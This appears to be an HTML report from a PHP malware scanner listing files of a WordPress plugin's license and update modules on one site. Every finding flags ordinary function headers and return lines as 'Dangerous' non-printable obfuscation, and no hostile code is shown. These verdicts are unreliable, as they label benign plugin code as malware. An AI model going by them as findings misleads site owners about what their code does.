<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_plugin</span><span style="color: #007700">() { if ( ! </span><span style="color: #0000BB">wp_verify_nonce</span><span style="color: #007700">( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'security'</span><span style="color: #007700">], </span><span style="color: #DD0000">'bsf_activate_extension_nonce' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">wp_send_json_error</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'success' </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">'message' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'You are not authorized to perform this action.'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf' </span><span style="color: #007700">), ) ); } if ( ! </span><span style="color: #0000BB">current_user_can</span><span style="color: #007700">( </span><span style="color: #DD0000">'i</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_plugin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_493").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/class-bsf-license-manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 34</span><br><table id="file_494" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_deactivate_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_activate_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_edd</span><span style="color: #007700">( </span><span style="color: #0000BB">$license_key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_product_info</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_is_active_license</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_remote_license_status</span><span style="color: #007700">( </span><span style="color: #0000BB">$purchase_key</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">get_transient</span><span style="color: #007700">( </span><span style="color: #0000BB">$transient_key </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">$license_status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_product_free</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_free</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_product_info</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 477</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">[ </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">][ </span><span style="color: #0000BB">$key </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">refresh_products_on_license_activae</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_core_license_activation_form_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 685</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">includes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_merge</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$action_links </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_popup_form_markup</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_css</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 863</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 866</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">license_activation_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 876</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 879</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$license_manager</span><span style="color: #007700">-></span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$license_from_type </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_494").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/class-bsf-wp-cli-command.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.10 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_495" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">license_manager </span><span style="color: #007700">= new </span><span style="color: #0000BB">BSF_License_Manager</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">license</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$assoc_args </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) && </span><span style="color: #DD0000">'activate' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] || </span><span style="color: #DD0000">'deactivate' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) { </span><span style="color: #0000BB">$action </span><span style="color: #007700">= </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]; } else { </span><span style="color: #0000BB">WP_CLI</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">( </span><span style="color: #DD0000">'Please enter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">license</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$assoc_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_495").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/class-bsf-update-manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 55</span><br><table id="file_496" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$brainstrom_products</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">BSF_Update_Manager</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_transient_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to update theme</span><span style="color: #DD0000">'s transient.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_update_themes_transient</span><span style="color: #007700">( </span><span style="color: #0000BB">$_transient_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">- IF </span><span style="color: #0000BB">updates are to be enabled</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">if </span><span style="color: #0000BB">updates are to be disabled</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enable_auto_updates</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">"bsf_enable_product_autoupdates_</span><span style="color: #007700">{</span><span style="color: #0000BB">$product_id</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
